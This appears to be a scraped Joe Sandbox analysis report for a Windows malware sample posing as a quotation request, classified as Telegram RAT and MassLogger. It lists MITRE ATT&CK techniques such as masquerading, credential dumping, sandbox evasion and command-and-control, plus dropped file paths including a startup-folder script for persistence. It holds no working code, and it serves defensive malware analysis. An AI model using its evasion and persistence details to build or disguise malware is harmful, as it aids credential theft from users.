Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION REQUEST - BQS058.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Allene\nonplacental.exe

C:\Users\user\AppData\Local\Temp\aut301F.tmp

C:\Users\user\AppData\Local\Temp\aut338A.tmp

C:\Users\user\AppData\Local\Temp\aut670E.tmp

C:\Users\user\AppData\Local\Temp\tapestring

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
QUOTATION REQUEST - BQS058.exe

Function 00FD3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00FD49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00FD4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 01039155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00FD301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00FD3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00FD708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00FD3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00FD3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00FD3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre